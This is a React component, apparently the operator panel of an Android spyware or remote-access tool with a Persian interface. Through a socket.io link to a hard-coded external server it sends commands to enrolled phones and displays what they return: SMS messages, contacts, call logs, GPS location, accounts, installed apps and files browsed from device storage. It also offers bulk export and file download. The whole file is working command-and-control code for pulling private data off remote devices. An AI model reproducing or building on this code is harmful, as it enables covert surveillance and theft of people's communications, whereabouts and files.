import React, { useState } from "react";
import { useEffect } from "react";
import axios from "axios";
import Tbale from "../Table/Tbale";
import { FaFolder } from "react-icons/fa";
import { IoMdArrowRoundBack } from "react-icons/io";
import { CiFileOn } from "react-icons/ci";
import { FaDownload } from "react-icons/fa";
import { CiLocationOff } from "react-icons/ci";
import { io } from "socket.io-client";
import CacheBuster from "react-cache-buster";
import * as XLSX from 'xlsx';
import {
  BiSolidPhoneIncoming,
  BiSolidPhoneOutgoing,
  BiSolidPhoneOff,
} from "react-icons/bi";

import { Modal } from "flowbite-react";
import Loader from "../Loader/Loader";

import InfoTable from "./InfoTable";
import { NotificationManager } from "react-notifications";
const override = {
  display: "block",
  margin: "0 auto",
  borderColor: "red",
};
function InfoPhones({ bar, BaseUrl, UserId }) {
  // var socketInstance = io.connect("https://urmianews.com");

  // const socketInstance = io("http://192.168.1.102:3001");
  const socketInstance = io("http://urmianews.com:7677");
  const [openModalaccount, setopenModalaccount] = useState(false);
  const [openModalSms, setopenModalSms] = useState(false);
  const [openModalApplist, setModalApplist] = useState(false);
  const [openModalcontact, setModalcontact] = useState(false);
  const [openModalcalllog, setModalcalllog] = useState(false);
  const [openModallocation, setopenModallocation] = useState(false);
  const [openModalstorage, setopenModalstorage] = useState(false);
  const [openModalstorageDownload, setopenModalstorageDownload] =
    useState(false);
  const [ID, setID] = useState();
  const [path, setpath] = useState("storage");
  const [cutpath, setcutpath] = useState();
  const [Allphones, setAllphones] = useState([]);
  const [socketID, setsocketID] = useState();
  const [socketdata, setsocketdata] = useState([]);
  const [accountdata, setaccountdata] = useState([]);
  const [smsdata, setsmsdata] = useState(null);
  const [applistdata, setapplistdata] = useState(null);
  const [contactdata, setcontactdata] = useState(null);
  const [calllogdata, setcalllogdata] = useState(null);
  const [storagedata, setstoragedata] = useState(null);
  const [Name, SetName] = useState("");
  const [Downloadfile, setDownloadfile] = useState(null);
  const [locationdata, setlocationdata] = useState({});
  const [statusdata, setstatusdata] = useState({});
  const [socket, setSocket] = useState(null);
  const [open, setOpen] = React.useState(false);
  const [removeId,setremoveId]=useState()

  useEffect(() => {
    setSocket(socketInstance);

    socketInstance.on("connect", function () {
      if (socketInstance.connected) {
        socketInstance.on("receive_message", (data, id) => {
          setstatusdata(data);
          setlocationdata(data);
          const arr = [];
          arr.push(data);
          setsocketID(id);
          setsocketdata(data);
          setaccountdata(JSON.parse(data));
          setsmsdata(JSON.parse(data));
          setapplistdata(JSON.parse(data));
          setcontactdata(JSON.parse(data));
          setcalllogdata(JSON.parse(data));
          setstoragedata(JSON.parse(data));
          setDownloadfile(JSON.parse(data));
        });
      }
    });
    // socketInstance.send("message", "hiiiiiii");
  }, []);

  const Handler_account = (id) => {
    setID(id);
    socket.emit(
      "send_message",
      { command: "account", id },
      function (dataFromServer) {}
    );
    setopenModalaccount(true);
  };

  const Handler_sms = (id) => {
    console.log(id,"llllllkkkk")
    setID(id);
    socket.emit(
      "send_message",
      { command: "sms", id },
      function (dataFromServer) {}
    );
    setopenModalSms(true);
  };

  const handler_applist = (id) => {
    setID(id);
    socket.emit(
      "send_message",
      { command: "applist", id },
      function (dataFromServer) {}
    );
    setModalApplist(true);
  };
  const handler_contact = (id) => {
    setID(id);
    socket.emit(
      "send_message",
      { command: "contact", id },
      function (dataFromServer) {}
    );
    setModalcontact(true);
  };
  const handler_calllog = (id) => {
    setID(id);
    socket.emit(
      "send_message",
      { command: "calllog", id },
      function (dataFromServer) {}
    );
    setModalcalllog(true);
  };
  const handler_location = (id) => {
    setID(id);
    socket.emit(
      "send_message",
      { command: "location", id },
      function (dataFromServer) {}
    );
    setopenModallocation(true);
  };

  const handler_storage = (id) => {
    setID(id);
    socket.emit(
      "send_message",
      { command: path, id },
      function (dataFromServer) {}
    );
    setopenModalstorage(true);
  };

  const Handler_AcctionStorage = (name) => {
    let id = ID;
    let path1 = `${path}/${name}`;
    setpath(path1);
    socket.emit(
      "send_message",
      { command: `${path}/${name}`, id },
      function (dataFromServer) {}
    );
    setopenModalstorage(true);
  };

  const Handler_close_storage_modal = () => {
    setopenModalstorage(false);
  };
  const Handler_AcctionStorageDownload = (name) => {
    setopenModalstorageDownload(true);
    setDownloadfile([]);
    let id = ID;
    let path1 = `${path}/${name}`;
    setpath(path1);
    socket.emit(
      "send_message",
      { command: `${path}/${name}`, id },
      function (dataFromServer) {}
    );
    setstoragedata([]);
  };
  const handler_delete = () => {
    console.log(removeId)
    axios
      .delete(`${BaseUrl}/phone/delete/${removeId}`, { headers: headers })
      .then((res) => {
        console.log(res.data);
        getAllData();
        setOpen(false);
      })
      .catch((error) => {});
  };

  const Handlercloseaccount = () => {
    setaccountdata([]);
    setopenModalaccount(false);
  };
  const Handlerclosesms = () => {
    setopenModalSms(false);
  };
  const Handlercloseapplist = () => {
    setapplistdata([]);
    setModalApplist(false);
  };
  const Handlerclosecontact = () => {
    setcontactdata([]);
    setModalcontact(false);
  };
  const Handlerclosecalllog = () => {
    setcalllogdata([]);
    setModalcalllog(false);
  };
  const Handlercloselocation = () => {
    setlocationdata([]);
    setopenModallocation(false);
  };
  const Handlerclosestorage = () => {
    setstoragedata([]);
    setpath("storage");
  };
  const HandlerclosestorageDownload = () => {
    setDownloadfile([]);
    setopenModalstorageDownload(false);
    setopenModalstorage(true);
    setpath(path);
  };
  const headers = {
    "Content-Type": "application/json",
    Authorization: `Bearer ${localStorage.getItem("TOKEN")}`,
    withCredentials: true,
    HttpOnly: true,
  };
  const Handeler_Update = (id) => {
    console.log(id);
    axios
      .patch(`${BaseUrl}/phone/status-no/${id}`, {}, { headers: headers })
      .then((res) => {
        getAllData();
      })
      .catch((err) => {});
    socket.emit(
      "send_message",
      { command: "test", id },
      async function (dataFromServer) {
        console.log("reza yesssss");
        socketInstance.on("receive_message", (data, id) => {
          if (data) {
            axios
              .patch(
                `${BaseUrl}/phone/status-ok/${id}`,
                {},
                { headers: headers }
              )
              .then((res) => {
                console.log(res, "reza aaaaaa");
              })
              .catch((err) => {});
          } else {
            return null;
          }
        });
      }
    );
  };
  function getAllData() {
    axios
      .get(`${BaseUrl}/phone/all`, { headers: headers })
      .then((res) => {
        setAllphones(res.data);
      })
      .catch((error) => {});
  }
  useEffect(() => {
    getAllData();

    setTimeout(() => {
      let data = {
        SOCKET_ID: socketID,
        ANDROID_ID: socketdata.ANDROID_ID,
        MacAddress: socketdata.MacAddress,
        FINGERPRINT: socketdata.FINGERPRINT,
        MODEL: socketdata.MODEL,
        BRAND: socketdata.BRAND,
        RELEASE: socketdata.RELEASE,
        SimOperatorName: socketdata.SimOperatorName,
        DeviceUserName: Name,
        status: true,
      };

      if (data.SOCKET_ID == undefined && data.ANDROID_ID == undefined) {
        return null;
      } else {
        axios
          .patch(`${BaseUrl}/phone/${data.ANDROID_ID}`, data, {
            headers: headers,
          })
          .then((res) => {
            getAllData();
          })
          .catch((error) => {});
      }
    }, 1000);
  }, [socketdata, statusdata]);

  const Handler_Back = () => {
    let pathindexof = path.lastIndexOf("/");
    let cut = path.substring(0, pathindexof);
    if (cut == "storage") {
      setcutpath("storage");
    }
    let id = ID;
    socket.emit(
      "send_message",
      { command: `${cut}`, id },
      function (dataFromServer) {
        // DownloadFilejson("location", locationdata);
      }
    );
    setpath(cut);
  };

  function base64toPDF(data, filename) {
    let pathindexof = filename.lastIndexOf(".");
    let cut = filename.substr(pathindexof);
    if (cut === ".jpg") {
      var a = document.createElement("a"); //Create <a>
      a.href = "data:image/png;base64," + data; //Image Base64 Goes here
      a.download = `${filename}`; //File name Here
      a.click();
    } else {
      var bufferArray = base64ToArrayBuffer(data);
      var blobStore = new Blob([bufferArray], { type: "application/pdf" });
      if (window.navigator && window.navigator.msSaveOrOpenBlob) {
        window.navigator.msSaveOrOpenBlob(blobStore);
        return;
      }
      var data = window.URL.createObjectURL(blobStore);
      var link = document.createElement("a");
      document.body.appendChild(link);
      link.href = data;
      link.download = `${filename}`;
      link.click();
      window.URL.revokeObjectURL(data);
      link.remove();
    }
  }
  function base64ToArrayBuffer(data) {
    var bString = window.atob(data);
    var bLength = bString.length;
    var bytes = new Uint8Array(bLength);
    for (var i = 0; i < bLength; i++) {
      var ascii = bString.charCodeAt(i);
      bytes[i] = ascii;
    }
    return bytes;
  }

  const DownloadJSON = (data, name) => {
    // const element = document.createElement("a");
    // const file = new Blob([JSON.stringify(data)], {
    //   type: "text/json;charset=utf-8",
    // });
    // element.href = URL.createObjectURL(file);
    // element.download = `${name}${new Date()}.json`;
    // document.body.appendChild(element); // Required for this to work in FireFox
    // element.click();
    const worksheet = XLSX.utils.json_to_sheet(data);
    const workbook = XLSX.utils.book_new();
    XLSX.utils.book_append_sheet(workbook, worksheet, "Sheet1");
    //let buffer = XLSX.write(workbook, { bookType: "xlsx", type: "buffer" });
    //XLSX.write(workbook, { bookType: "xlsx", type: "binary" });
    XLSX.writeFile(workbook, `${name}.xlsx`);
  };
  const Handler_ContactDownload = () => {
    DownloadJSON(contactdata, "contact");
  };
  const Handler_APPLISTtDownload = () => {
    DownloadJSON(applistdata, "applist");
  };
  const Handler_ACCOUNTtDownload = () => {
    DownloadJSON(accountdata, "account");
  };
  const Handler_CALLLOG = () => {
    DownloadJSON(calllogdata, "calllog");
  };
  const Handler_SMSDownload = () => {
    DownloadJSON(smsdata, "sms");
  };

  const Handler_DeleteModal = (id) => {
    console.log(id)
    setremoveId(id)
    setOpen(!open);
  };
  const updateFieldChanged = (index) => (e) => {
    console.log("index: " + index);
    console.log("property name: " + e.target.name);
    let newArr = { ...Allphones.Phones }; // copying the old datas array
    // a deep copy is not needed as we are overriding the whole object below, and not setting a property of it. this does not mutate the state.
    newArr[index].DeviceUserName = e.target.value; // replace e.target.value with whatever you want to change it to

    SetName(newArr[index].DeviceUserName);
    console.log(Name);
  };
  const Handler_SaveDeviceUserName = (id) => {
    console.log(id);
    const data = {
      DeviceUserName: Name,
    };
    axios
      .patch(`${BaseUrl}/phone/deviceusername/${id}`, data, {
        headers: headers,
      })
      .then((res) => {
        NotificationManager.success(res.data.message);
      })
      .catch((error) => {});
  };

  return (
    <div
      className={`${
        bar ? "md:block  col-span-10 mr-16" : "md:block  col-span-11 mr-10"
      }`}
    >
      <div className=" flex text-orange-700 mb-5 w-full justify-between rounded-l-xl bg-slate-700 text-center relative left-8 p-1 mt-10">
        <p className="text-4xl">اطلاعات گوشی‌ها</p>
      </div>

      <div className="bg-white p-4 mt-14 m-10 h-auto rounded-md shadow-md shadow-slate-200 ">
        <div class="relative overflow-x-auto shadow-md sm:rounded-lg ">
          <div className="w-full h-[40rem] overflow-y-auto">
            <table class="w-full text-sm text-left text-gray-500 dark:text-gray-400">
              <CacheBuster
                //If false, the library is disabled.
                isVerboseMode={false} //If true, the library writes verbose logs to console.
                loadingComponent={<Loader />} //If not pass, nothing appears at the time of new version check.
                //If public assets are hosted somewhere other than root on your server.
              >
                <InfoTable />
                <Tbale
                  Allphones={Allphones}
                  BaseUrl={BaseUrl}
                  Handler_account={Handler_account}
                  Handler_sms={Handler_sms}
                  handler_applist={handler_applist}
                  handler_contact={handler_contact}
                  handler_calllog={handler_calllog}
                  handler_delete={handler_delete}
                  open={open}
                  setOpen={setOpen}
                  handler_location={handler_location}
                  handler_storage={handler_storage}
                  Handler_DeleteModal={Handler_DeleteModal}
                  Handeler_Update={Handeler_Update}
                  Handler_SaveDeviceUserName={Handler_SaveDeviceUserName}
                  updateFieldChanged={updateFieldChanged}
                />
              </CacheBuster>
            </table>
          </div>
        </div>
      </div>
      <Modal
        size="7xl"
        dir="ltr"
        dismissible
        show={openModalaccount}
        onClose={Handlercloseaccount}
      >
        <Modal.Header>
          <h1>حسابها</h1>
        </Modal.Header>
        <div className="w-full h-screen ">
          <div className="bg-orange-600 rounded-md shadow-md m-5 flex items-center p-4 ">
            <button
              className="bg-green-700 text-white px-4 py-2 rounded-lg shadow-lg flex items-center "
              onClick={Handler_ACCOUNTtDownload}
            >
              {" "}
              <FaDownload className="mr-2" />
              دانلود تمام حساب ها
            </button>
          </div>
          {accountdata ? (
            <table
              class="w-full text-sm text-left text-gray-500 dark:text-gray-400 justify-center"
              style={{ direction: "rtl" }}
            >
              <thead class="text-xs text-gray-700 uppercase bg-gray-50 dark:bg-gray-700 dark:text-gray-400 ">
                <tr>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    ردیف
                  </th>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    نام حساب
                  </th>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    نوع حساب
                  </th>
                </tr>
              </thead>
              <tbody>
                {accountdata &&
                  accountdata.map((item, index) => {
                    return (
                      <tr
                        key={index}
                        class="bg-white border-b dark:bg-gray-800 dark:border-gray-700 hover:bg-gray-50 dark:hover:bg-gray-600 "
                      >
                        <td class="w-32 py-4 text-center">{index + 1}</td>
                        <td class="w-32 py-4 text-center">{item.name}</td>
                        <td class="px-6 py-4 text-center font-semibold text-gray-900 dark:text-white">
                          {item.type}
                        </td>
                      </tr>
                    );
                  })}
              </tbody>
            </table>
          ) : (
            <Loader />
          )}
        </div>
      </Modal>

      {/* --------------- */}

      <Modal
        size="7xl"
        dir="ltr"
        dismissible
        show={openModalSms}
        onClose={Handlerclosesms}
      >
        <Modal.Header>
          <h1>پیام ها</h1>
        </Modal.Header>
        <div className="w-full h-screen ">
          <div className="bg-orange-600 rounded-md shadow-md m-5 flex items-center p-4 ">
            <button
              className="bg-green-700 text-white px-4 py-2 rounded-lg shadow-lg flex items-center "
              onClick={Handler_SMSDownload}
            >
              {" "}
              <FaDownload className="mr-2" />
              دانلود تمام پیام ها
            </button>
          </div>
          {smsdata ? (
            <table
              class="w-full text-sm text-left text-gray-500 dark:text-gray-400 justify-center"
              style={{ direction: "rtl" }}
            >
              <thead class="text-xs text-gray-700 uppercase bg-gray-50 dark:bg-gray-700 dark:text-gray-400 ">
                <tr>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    ردیف
                  </th>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    شماره یا نام کاربر
                  </th>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    متن sms
                  </th>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    تاریخ
                  </th>
                </tr>
              </thead>
              <tbody>
                {smsdata &&
                  smsdata.map((item, index) => {
                    return (
                      <tr
                        key={index}
                        class="bg-white border-b dark:bg-gray-800 dark:border-gray-700 hover:bg-gray-50 dark:hover:bg-gray-600 "
                      >
                        <td class="w-auto py-4 text-center">{index + 1}</td>
                        <td class="w-auto py-4 text-center">{item.no}</td>
                        <td class="w-auto py-4 text-center">
                          <p className="w-96">{item.body}</p>
                        </td>
                        <td class="px-6 py-4 text-center font-semibold text-gray-900 dark:text-white">
                          <h1 className="text-green-700 text-xl">
                            {" "}
                            {new Intl.DateTimeFormat("fa-u-ca-persian", {
                              dateStyle: "full",
                              timeStyle: "medium",
                              timeZone: "Asia/Tehran",
                            }).format(item.date)}
                          </h1>
                        </td>
                      </tr>
                    );
                  })}
              </tbody>
            </table>
          ) : (
            <Loader />
          )}
        </div>
      </Modal>

      {/* --------------- */}

      <Modal
        size="7xl"
        dir="ltr"
        dismissible
        show={openModalApplist}
        onClose={Handlercloseapplist}
      >
        <Modal.Header>
          <h1>لیست برنامه ها</h1>
        </Modal.Header>
        <div className="w-full h-screen ">
          <div className="bg-orange-600 rounded-md shadow-md m-5 flex items-center p-4 ">
            <button
              className="bg-green-700 text-white px-4 py-2 rounded-lg shadow-lg flex items-center "
              onClick={Handler_APPLISTtDownload}
            >
              {" "}
              <FaDownload className="mr-2" />
              دانلود تمام برنامه ها
            </button>
          </div>
          {applistdata ? (
            <table
              class="w-full text-sm text-left text-gray-500 dark:text-gray-400 justify-center"
              style={{ direction: "rtl" }}
            >
              <thead class="text-xs text-gray-700 uppercase bg-gray-50 dark:bg-gray-700 dark:text-gray-400 ">
                <tr>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    ردیف
                  </th>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    نام برنامه
                  </th>
                </tr>
              </thead>
              <tbody>
                {applistdata &&
                  applistdata.map((item, index) => {
                    return (
                      <tr
                        key={index}
                        class="bg-white border-b dark:bg-gray-800 dark:border-gray-700 hover:bg-gray-50 dark:hover:bg-gray-600 "
                      >
                        <td class="w-32 py-4 text-center">{index + 1}</td>
                        <td class="w-32 py-4 text-center">{item.name}</td>
                      </tr>
                    );
                  })}
              </tbody>
            </table>
          ) : (
            <Loader />
          )}
        </div>
      </Modal>

      {/* --------------- */}
      <Modal
        size="7xl"
        dir="ltr"
        dismissible
        show={openModalcontact}
        onClose={Handlerclosecontact}
      >
        <Modal.Header>
          <h1>لیست مخاطبین</h1>
        </Modal.Header>
        <div className="w-full h-screen ">
          <div className="bg-orange-600 rounded-md shadow-md m-5 flex items-center p-4 ">
            <button
              className="bg-green-700 text-white px-4 py-2 rounded-lg shadow-lg flex items-center "
              onClick={Handler_ContactDownload}
            >
              {" "}
              <FaDownload className="mr-2" />
              دانلود تمام مخاطبین ها
            </button>
          </div>
          {contactdata ? (
            <table
              class="w-full text-sm text-left text-gray-500 dark:text-gray-400 justify-center"
              style={{ direction: "rtl" }}
            >
              <thead class="text-xs text-gray-700 uppercase bg-gray-50 dark:bg-gray-700 dark:text-gray-400 ">
                <tr>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    ردیف
                  </th>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    نام مخاطب
                  </th>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    شماره مخاطب
                  </th>
                </tr>
              </thead>
              <tbody>
                {contactdata &&
                  contactdata.map((item, index) => {
                    return (
                      <tr
                        key={index}
                        class="bg-white border-b dark:bg-gray-800 dark:border-gray-700 hover:bg-gray-50 dark:hover:bg-gray-600 "
                      >
                        <td class="w-32 py-4 text-center">{index + 1}</td>
                        <td class="w-32 py-4 text-center">{item.Name}</td>
                        <td class="w-32 py-4 text-center">{item.Number}</td>
                      </tr>
                    );
                  })}
              </tbody>
            </table>
          ) : (
            <Loader />
          )}
        </div>
      </Modal>

      {/* --------------- */}
      <Modal
        size="7xl"
        dir="ltr"
        dismissible
        show={openModalcalllog}
        onClose={Handlerclosecalllog}
      >
        <Modal.Header>
          <h1>لیست گزارش تماس ها</h1>
        </Modal.Header>
        <div className="w-full h-screen ">
          <div className="bg-orange-600 rounded-md shadow-md m-5 flex items-center p-4 ">
            <button
              className="bg-green-700 text-white px-4 py-2 rounded-lg shadow-lg flex items-center "
              onClick={Handler_CALLLOG}
            >
              {" "}
              <FaDownload className="mr-2" />
              دانلود تمام گزارش تماس ها
            </button>
          </div>
          {calllogdata ? (
            <table
              class="w-full text-sm text-left text-gray-500 dark:text-gray-400 justify-center"
              style={{ direction: "rtl" }}
            >
              <thead class="text-xs text-gray-700 uppercase bg-gray-50 dark:bg-gray-700 dark:text-gray-400 ">
                <tr>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    ردیف
                  </th>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    شماره
                  </th>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    تاریخ تماس
                  </th>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    مدت زمان مکالمه (به ثانیه)
                  </th>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    نوع تماس
                  </th>
                </tr>
              </thead>
              <tbody>
                {calllogdata &&
                  calllogdata.map((item, index) => {
                    return (
                      <tr
                        key={index}
                        class="bg-white border-b dark:bg-gray-800 dark:border-gray-700 hover:bg-gray-50 dark:hover:bg-gray-600 "
                      >
                        <td class="w-32 py-4 text-center">{index + 1}</td>
                        <td class="w-32 py-4 text-center">{item.Number}</td>
                        <td class="w-32 py-4 text-center">
                          <h1 className="text-green-700 text-xl">
                            {" "}
                            {new Intl.DateTimeFormat("fa-u-ca-persian", {
                              dateStyle: "full",
                            }).format(item.callDate)}
                          </h1>
                        </td>
                        <td class="w-32 py-4 text-center">
                          {item.callDuration}
                        </td>
                        <></>
                        <td class="w-32 py-4 text-center m-auto">
                          {(() => {
                            if (item.direction == "INCOMING") {
                              return (
                                <BiSolidPhoneIncoming className="text-green-600 text-xl m-auto" />
                              );
                            } else if (item.direction == "OUTGOING") {
                              return (
                                <BiSolidPhoneOutgoing className="text-red-600 text-xl m-auto" />
                              );
                            } else {
                              return (
                                <BiSolidPhoneOff className="text-red-600 text-xl m-auto" />
                              );
                            }
                          })()}
                        </td>
                      </tr>
                    );
                  })}
              </tbody>
            </table>
          ) : (
            <Loader />
          )}
        </div>
      </Modal>
      {/* --------------- */}
      <Modal
        size="7xl"
        dir="ltr"
        dismissible
        show={openModallocation}
        onClose={Handlercloselocation}
      >
        <Modal.Header>
          <h1>نمایش نقشه </h1>
        </Modal.Header>
        <div className="w-full h-screen ">
          {locationdata.status === "false" ? (
            <>
              <div className="flex justify-center bg-red-300">
                <p className="text-3xl">موقعیت مکانی گوشی خاموش است</p>
                <CiLocationOff className="text-3xl text-red-800" />
              </div>
            </>
          ) : (
            <table
              class="w-full text-sm text-left text-gray-500 dark:text-gray-400 justify-center"
              style={{ direction: "rtl" }}
            >
              <thead class="text-xs text-gray-700 uppercase bg-gray-50 dark:bg-gray-700 dark:text-gray-400 ">
                <tr>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    طول جغرافیایی
                  </th>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    عرض جغرافیایی
                  </th>

                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    عملیات
                  </th>
                </tr>
              </thead>
              <tbody>
                <tr class="bg-white border-b dark:bg-gray-800 dark:border-gray-700 hover:bg-gray-50 dark:hover:bg-gray-600 ">
                  <td class="w-32 py-4 text-center">
                    {locationdata.Longitude}
                  </td>
                  <td class="w-32 py-4 text-center">{locationdata.Latitude}</td>
                  <td class="w-32 py-4 text-center">
                    <a
                      href={`http://maps.google.com/maps?z=11&t=k&q=${locationdata.Longitude}E ${locationdata.Latitude}N`}
                      className="bg-yellow-400 text-white px-4 rounded-md shadow-md py-2 cursor-pointer"
                    >
                      نمایش نقشه
                    </a>
                  </td>
                </tr>
              </tbody>
            </table>
          )}
        </div>
      </Modal>

      {/* --------------- */}
      <Modal
        size="7xl"
        dir="ltr"
        dismissible
        show={openModalstorage}
        onClose={Handler_close_storage_modal}
      >
        <Modal.Header>
          <h1>حافظه</h1>
        </Modal.Header>
        <div className="w-full h-screen ">
          <div className="bg-orange-600 rounded-md shadow-md m-5 flex items-center">
            {cutpath === "storage" && path === "storage" ? (
              ""
            ) : (
              <IoMdArrowRoundBack
                className="text-white text-3xl cursor-pointer"
                onClick={Handler_Back}
              />
            )}
            <p className="p-2 text-white">{path}</p>
          </div>
          {storagedata ? (
            <table
              class="w-full text-sm text-left text-gray-500 dark:text-gray-400 justify-center"
              style={{ direction: "rtl" }}
            >
              <thead class="text-xs text-gray-700 uppercase bg-gray-50 dark:bg-gray-700 dark:text-gray-400 ">
                <tr>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    ردیف
                  </th>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    نام پوشه
                  </th>

                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    عملیات
                  </th>
                </tr>
              </thead>
              <tbody>
                {storagedata &&
                  storagedata.map((item, index) => {
                    return (
                      <tr class="bg-white border-b dark:bg-gray-800 dark:border-gray-700 hover:bg-gray-50 dark:hover:bg-gray-600 ">
                        <td class="w-32 py-4 text-center">{index + 1}</td>
                        <td class="w-auto py-4 text-center flex items-center">
                          {item.type == "folder" ? (
                            <FaFolder className="text-yellow-400 text-2xl items-center" />
                          ) : (
                            <CiFileOn className=" text-2xl items-center" />
                          )}

                          <h1 className="text-xl m-auto">{item.name}</h1>
                        </td>
                        <td class="w-32 py-4 text-center">
                          {item.type == "folder" ? (
                            <button
                              onClick={() => Handler_AcctionStorage(item.name)}
                              className="bg-light-green-900 px-4 py-2 rounded-md shadow-md items-center text-white"
                            >
                              انتخاب
                            </button>
                          ) : (
                            <button
                              onClick={() =>
                                Handler_AcctionStorageDownload(item.name)
                              }
                              className="bg-light-green-900 px-4 py-2 rounded-md shadow-md items-center text-white"
                            >
                              دانلود
                            </button>
                          )}
                        </td>
                      </tr>
                    );
                  })}
              </tbody>
            </table>
          ) : (
            <Loader />
          )}
        </div>
      </Modal>

      {/* --------------- */}

      <Modal
        size="7xl"
        dir="ltr"
        dismissible
        show={openModalstorageDownload}
        onClose={HandlerclosestorageDownload}
      >
        <Modal.Header>
          <h1>دانلود</h1>
        </Modal.Header>
        <div className="w-full overflow-scroll">
          {Downloadfile == [] ? (
            <Loader />
          ) : (
            <table
              class="w-full text-sm text-left text-gray-500 dark:text-gray-400 justify-center"
              style={{ direction: "rtl" }}
            >
              <thead class="text-xs text-gray-700 uppercase bg-gray-50 dark:bg-gray-700 dark:text-gray-400 ">
                <tr>
                  <th scope="col" class="px-6 py-3 text-xl text-center">
                    ردیف
                  </th>
                  <th
                    scope="col"
                    class="px-6 py-3 text-xl text-center items-center justify-center flex"
                  >
                    تصویر
                  </th>
                  <th scope="col" class="w-32 px-6 py-3 text-xl text-center ">
                    نام پوشه
                  </th>
                  <th scope="col" class="w-32 px-6 py-3 text-xl text-center ">
                    دانلود
                  </th>
                </tr>
              </thead>
              <tbody>
                {Downloadfile &&
                  Downloadfile.map((item, index) => {
                    return (
                      <tr class="bg-white border-b dark:bg-gray-800 dark:border-gray-700 hover:bg-gray-50 dark:hover:bg-gray-600 ">
                        <td class="w-32 py-4 text-center">{index + 1}</td>
                        <td class="w-44 py-4 text-center">
                          <img
                            className="w-full items-center justify-center flex"
                            src={`data:image/png;base64,${item.file}`}
                          />
                        </td>
                        <td class=" py-4 text-center  w-32">
                          <h1 className="text-xl m-auto">{item.filename}</h1>
                        </td>
                        <td class=" py-4 text-center  w-32">
                          <button
                            onClick={() =>
                              base64toPDF(item.file, item.filename)
                            }
                          >
                            دانلود فایل
                          </button>
                        </td>
                      </tr>
                    );
                  })}
              </tbody>
            </table>
          )}
        </div>
      </Modal>
    </div>
  );
}

export default InfoPhones;
